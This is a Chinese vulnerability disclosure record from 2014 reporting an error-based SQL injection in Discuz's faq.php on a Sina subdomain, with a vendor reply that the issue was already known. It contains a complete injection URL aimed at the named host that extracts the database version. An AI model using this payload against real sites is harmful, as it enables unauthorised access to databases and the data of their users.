2014-07-02:细节已通知厂商并且等待厂商处理中
2014-07-03:厂商已经主动忽略漏洞,细节向公众公开
报错注入
详细说明:dz faq.php存在注入漏洞,大范围爆发了,各大站点纷纷躺枪
注入点地址:
http://club.show.sina.com.cn/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23
修复方案:
打补丁。。
版权声明:转载请注明来源 greg.wu@乌云 漏洞回应 厂商回应:危害等级:无影响厂商忽略
忽略时间:2014-07-03 10:09
厂商回复:已经有白帽子提前通过ssrc提交过其漏洞,感谢对新浪安全的支持.
最新状态:暂无
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;